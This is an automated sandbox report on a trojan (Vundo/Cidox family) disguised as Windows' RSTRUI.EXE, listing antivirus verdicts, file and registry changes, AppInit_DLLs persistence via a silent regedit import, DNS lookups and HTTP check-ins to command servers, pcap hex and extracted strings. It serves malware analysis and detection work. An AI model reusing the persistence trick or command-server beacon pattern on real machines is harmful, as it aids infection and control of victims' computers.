Analysis Date2014-11-22 10:24:05
MD527693900b327b570d0aa240a2da1fbd9
SHA19f899723711a6fba750a102087c1409d8a2a3c41

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2d1ba9174b64608447ea98175109840f sha1: b210ba5bf7fe4423441d2572a337dd82c256e5a9 size: 91648
Section_ASM2 md5: 62c826d4ddef367d075c0cba0669f0a0 sha1: b240b0ac984e37c53bffb3e34f2fc960b9468d77 size: 63488
Section.rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section.data md5: 38e766bb1ef49e52025bc1f89e1812ff sha1: edbc9cadc0cfd216f791595068951582ff10913c size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp2012-09-25 04:15:44
VersionLegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
PackerMicrosoft Visual C++ ?.?
PEhashed7168502630d6f765608bf68788c6f93aa2bee5
IMPhash11c52178b812c23b7febf02fc8e99619
AV360 SafeGen:Variant.Spy.5
AVAd-AwareGen:Variant.Spy.5
AVAlwil (avast)Vundo-XF [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen7
AVBullGuardGen:Variant.Spy.5
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVWIN.Trojan.Agent-164717
AVDr. WebTrojan.Inject1.10169
AVEmsisoftGen:Variant.Spy.5
AVEset (nod32)Win32/Kryptik.AMFU
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Spy.5
AVGrisoft (avg)Generic_r.BGN
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Backdoor ( 04c4f2bf1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.FakeMS.ED
AVMcafeeVundo-FASV!27693900B327
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Spy.5
AVRisingno_virus
AVSophosMal/Vundo-M
AVSymantecTrojan.Gen.2
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\hyjrqnc.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNS91.220.35.154
Winsock DNSterrans.su
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSverzinla.com
Winsock DNSgetintsu.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSveriolana.com
Winsock DNSinzavora.com
Winsock DNSodobvare.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\hyjrqnc.dll\\x00

Network Details:

DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
209.222.14.3
DNSfescheck.com
Type: A
209.222.14.3
DNSinstrango.com
Type: A
204.11.56.26
DNSinzavora.com
Type: A
141.8.225.80
DNSdenadb.com
Type: A
204.11.56.26
DNSforadns.com
Type: A
141.8.225.62
DNSveriolana.com
Type: A
DNSverzinla.com\032
Type: A
DNSnetrovad.com
Type: A
DNSodobvare.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7KXq7TYIaWNT
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7GWqf3nLQkm3
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7C2CLOdXR1x7
User-Agent:
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7Bf8bvoXlKnf
User-Agent:
HTTP GEThttp://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7EZ5+AFDzOit
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7DU5SDo9CRU2
User-Agent:
HTTP GEThttp://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7B4l6AvLbvw9
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.26:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 204.11.56.26:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.62:80
Flows TCP192.168.1.1:1039 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374d68 48596676 566a6476 6d204854   x7MhHYfvVjdvm HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   74696e74 73752e63 6f6d0d0a 0d0a       tintsu.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374b58 71375459 4961574e 54204854   x7KXq7TYIaWNT HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   7461766f 6465732e 636f6d0d 0a0d0a     tavodes.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374757 7166336e 4c516b6d 33204854   x7GWqf3nLQkm3 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207472   TP/1.1..Host: tr
0x000000e0 (00224)   79617464 6e732e63 6f6d0d0a 0d0a0a     yatdns.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374332 434c4f64 58523178 37204854   x7C2CLOdXR1x7 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206665   TP/1.1..Host: fe
0x000000e0 (00224)   73636865 636b2e63 6f6d0d0a 0d0a0a     scheck.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374266 3862766f 586c4b6e 66204854   x7Bf8bvoXlKnf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   73747261 6e676f2e 636f6d0d 0a0d0a     strango.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374d68 48596676 566a6476 6d204854   x7MhHYfvVjdvm HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   7a61766f 72612e63 6f6d0d0a 0d0a0a     zavora.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   7837455a 352b4146 447a4f69 74204854   x7EZ5+AFDzOit HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206465   TP/1.1..Host: de
0x000000e0 (00224)   6e616462 2e636f6d 0d0a0d0a 0d0a0a     nadb.com.......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374455 3553446f 39435255 32204854   x7DU5SDo9CRU2 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20666f   TP/1.1..Host: fo
0x000000e0 (00224)   7261646e 732e636f 6d0d0a0d 0a0a0a     radns.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374234 6c364176 4c627677 39204854   x7B4l6AvLbvw9 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323230 2e33352e 3135340d 0a0d0a     .220.35.154....


Strings
PM
a
..
.>uriVttcetorla
\
.CC
 
.
a.X
.uri

041904B0
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
333f3
5.1.2600.5512
5.1.2600.5512 (xpsp.080413-2108)
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
f3fff
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
 Microsoft
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
RSTRUI.EXE
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
 Windows
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0E~oski
0SSSSS
_0=?YYe
1cucf'
1LZ]5nN8U`a
1mNlOc
28BHT}BHRX
4cz`M	5
	4juPo*22?
4twgS`
)59Ea<Yeiu
5xsylhhlSt
.6#K4M
:-6lBp?
6lW@9]
)7U	yu
7}~w/O
8;7780
>8-DSU
,8qCN/|5
".9p6n
9T#rr-@/
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
ADVAPI32.DLL
AdviseInUserModeA
.agN_C;
;AKQMtkq{Gq
A<MN~j
An application has made an attempt to load the C runtime library incorrectly.
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
az :Wm?4
&b6Gqa
BeginPaint
bhrxT]
bhrxT]RX
=B@@qO
BtrV@cd
BX-,)E
C@3Du5
	C62rH
CIL\Z"
CloseHandle
CorExitProcess
CoTaskMemAlloc
CreateBitmap
CreateSolidBrush
CreateWindowExA
}cRnRr&"A3Sp
- CRT not initialized
ctner?
Cw Crro1
@CwN+;%?
c|'_xh
@.data
DateTime:%04d.%02d:%d
dcdli=
DDDDDC
DDDDDDDDDD
dddd, MMMM dd, yyyy
dE|6I?
December
DecodePointer
DeleteCriticalSection
DestroyWindow
DeviceIoControl
DispatchMessageA
DltHr)
DOMAIN error
DrawTextA
DrleN\
eA&7eu
[eaTNe
eCee39
eg,Is;
_eipiF
,elSlX
EncodePointer
EndPaint
EnterCriticalSection
:ENU~5
erhN2sWct
erxDr& .ltF
>eteH!
 eu&0 dni
 eufp n/eR)
 euv@ vmt`mn gsF
_`EUY+
ExitProcess
.!e]Y|
EY;HI1
February
FindResourceA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
@FPY3vF9YP'
FqF1~ 
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
fuvpWuY
<	g5aO
gb pn7
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
G;gYd'
G!?<HW
gJvvP)
gmC#kQ
{gp\t(
gSORl6
	H2R.Lr
HcZ'Hjnn
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
^HfF*@L
HH:mm:ss
"HNDe#w
Hp7I	1h
)hPMu`
h/V}[c
Hy`<A_z>C
hyNvS(
ibBZJr
\iieSA
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
`IymiL
JanFebMarAprMayJunJulAugSepOctNovDec
January
JavaStudioClass
J-F"&~
j/G3e8g
jI6Dto
j{i|FN#H
 'j^iM
j@j ^V
=J\L^f
jogwp6
K|{]@ 
.KAE!<nCVi
KERNEL32.dll
kfTr\,
!+kg H
kpJyM8'iT
kSp9&0D
>lBXS'9
lClfZt
LCMapStringA
LCMapStringW
LeaveCriticalSection
lEesOqr
lelV}VtrntG
liVee|tl
':Ljm	
l\	LQc
lLu.%I
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadIconW
LoadLibraryA
LoadResource
LoadStringA
LockResource
lP%Hsv
lstrcmpiA
lUG*BK
lWorr0dFl
,M4,=:
"~MbI	NuM
+M,C{E
MessageBoxA
 m Excemh5
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
@M@]QD
MultiByteToWideChar
ndudYTuaaF.2uMuH
|neei)
n iiL7
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
N<@tjo
o2PsSvoduPi*tmWeI9Er
(O|&7;
October
)o`~f@+
ole32.dll
ortbcfu
|OslZ`
o sooIee  ?uS-id
p+F]HK
PG!|et
phJFsprm
Please contact the application's support team for more information.
P'mBEt
PPPPPPPP
P`/Rk	T
Program: 
<program name unknown>
%ptuiWYeo
- pure virtual function call
<q,)8g
q@dh0:
Qo%emcW<L
!*QuAJQZ
QueryPerformanceCounter
r`4Nt/
+R8jGh^
`.rdata
Rectangle
RegConnectRegistryA
RegisterClassExA
rGnrI0
RKEeupe
r\m3v@05
Rod\en
RrdTcy
RtlUnwind
runtime error 
Runtime Error!
rxVYeI
s;!69~0
Saturday
scm32.dll
September
SetFilePointer
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
/sh=,	
ShowWindow
SING error
+Sio4F
SjtUG9
~Soh@t
 s`pe cO*i
ssme%j
strcat
Sunday
SunMonTueWedThuFriSat
@@Su w
sV!8o_
SyDOW),
S:YW>%
t0@MBG^B
T]28bh
tCGTlM
TerminateProcess
)_TEW_
TextOutA
tH]eF|eo
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
@*,T!i
< tK<	tG
